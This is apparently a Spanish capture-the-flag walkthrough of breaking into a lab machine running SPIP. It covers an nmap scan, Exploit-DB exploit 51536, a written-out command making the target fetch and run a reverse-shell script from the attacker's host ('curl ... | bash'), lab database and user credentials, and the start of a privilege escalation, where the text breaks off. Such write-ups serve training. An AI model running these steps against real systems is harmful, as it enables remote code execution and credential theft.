Hacemos el escaneo con nmap:

Esto es lo que corre por el puerto 80:

Vemos en searchsploit si existen exploits con SPIP:

O también por exploitdb y nos bajamos este mismo:

https://www.exploit-db.com/exploits/51536

Por tanto lo que haremos será primero crear un servidor http con python con el payload de la reverse shell:

Lanzamos el exploit:

python3 51536.py -u http://192.168.0.34/ -c "curl 192.168.0.32 | bash" -v

Y recibimos la conexión con netcat:

Y el contenido del fichero .bash_history nos da una pista de que igual podemos entrar a la base de datos, aunque aún nos falta la contraseña:

Y dentro del directorio config nos encontramos con un archivo llamado connect.php con la contraseña de root de la base de datos:

root:dbpassword

Usamos la base de datos spip y vemos una tabla llamada spip_auteurs:

Seleccionamos todo el contenido de la tabla spip_auteurs y vemos las credenciales del usuario angela:

angela:4ng3l4

Nos autenticamos y ya somos el usuario angela:

Y vemos que estamos ante esta versión de ubuntu:

Y si miramos en google tenemos este exploit:

Y buscamos por ese cve llegando a este repositorio de github:

Nos lo bajamos en la máquina víctima:

Ejecutamos un try y comienza una especie de contador: